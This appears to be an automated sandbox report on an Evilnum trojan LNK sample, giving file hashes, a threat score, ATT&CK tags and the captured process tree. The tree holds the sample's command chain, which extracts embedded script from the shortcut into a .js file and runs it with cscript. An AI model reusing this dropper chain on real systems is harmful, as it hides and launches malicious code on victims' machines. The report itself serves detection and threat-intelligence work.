evilnum | 951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b

Analysis

Target

951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b.lnk
Size

51KB
MD5

5b733b77e3bd909efd9f7acfa58e4770
SHA1

228fe78f80565bc7c02da137505196e9edba767c
SHA256

951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b
SHA512

6ec7bf392a798a8dc04c9dee2d33190eecf564e2de33559f8b98151c58fc953d330a7165606dc1cc91743d2b8a1c852dba386bb66ea5de354e6cec37b676ce5d

Score

10^/10

evilnum trojan

Evilnum
A malware family with multiple components distributed through LNK files.
trojan evilnum
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 3544 wrote to memory of 512	3544	cmd.exe	70
PID 3544 wrote to memory of 512	3544	cmd.exe	70
PID 512 wrote to memory of 3788	512	cmd.exe	71
PID 512 wrote to memory of 3788	512	cmd.exe	71
PID 512 wrote to memory of 2272	512	cmd.exe	72
PID 512 wrote to memory of 2272	512	cmd.exe	72
PID 512 wrote to memory of 432	512	cmd.exe	73
PID 512 wrote to memory of 432	512	cmd.exe	73
PID 512 wrote to memory of 508	512	cmd.exe	74
PID 512 wrote to memory of 508	512	cmd.exe	74
PID 512 wrote to memory of 1352	512	cmd.exe	75
PID 512 wrote to memory of 1352	512	cmd.exe	75

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\951ca0adc511173018277b090a9eae3fb389092e095dbc4a0c9b67181dc43d1b.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:3544
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c path=C:\Windows\system32&&move "4.png*lnk " "C:\Users\Admin\AppData\Local\Temp\1.lnk"&forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "4.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"&type "C:\Users\Admin\AppData\Local\Temp\1.lnk"|find "TRU4">"C:\Users\Admin\AppData\Local\Temp\0.js"|rd a||cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:512
- - C:\Windows\system32\forfiles.exe
    forfiles /P "C:\Users\Admin\AppData\Local\Temp" /M "4.pn*.lnk" /S /D 0 /C "C:\Windows\system32\cmd.exe /c move @path C:\Users\Admin\AppData\Local\Temp\1.lnk"
    3⤵
    PID:3788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" type "C:\Users\Admin\AppData\Local\Temp\1.lnk""
    3⤵
    PID:2272
- - C:\Windows\system32\find.exe
    find "TRU4"
    3⤵
    PID:432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" rd a"
    3⤵
    PID:508
- - C:\Windows\system32\cscript.exe
    cScRiPt "C:\Users\Admin\AppData\Local\Temp\0.js"
    3⤵
    PID:1352

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact